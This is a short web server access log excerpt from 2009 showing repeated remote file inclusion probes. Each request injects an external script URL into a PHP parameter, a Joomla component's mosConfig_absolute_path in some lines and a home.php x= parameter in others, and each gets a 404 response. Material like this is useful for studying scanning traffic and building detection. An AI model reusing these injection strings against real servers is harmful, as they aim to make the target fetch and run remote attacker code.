72.32.125.147 - - [13/Oct/2009:04:07:15 -0400] "GET /logs/access_log.Q109071300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:07:18 -0400] "GET /logs/access_log.Q109053100/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:20 -0400] "GET /logs/access_log.Q109061200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.40.68.132 - - [13/Oct/2009:04:07:22 -0400] "GET /logs/access_log.Q109081500/home.php?x=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.32.125.147 - - [13/Oct/2009:04:07:26 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://route1eventservices.com/coppermine/include/fx29id.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
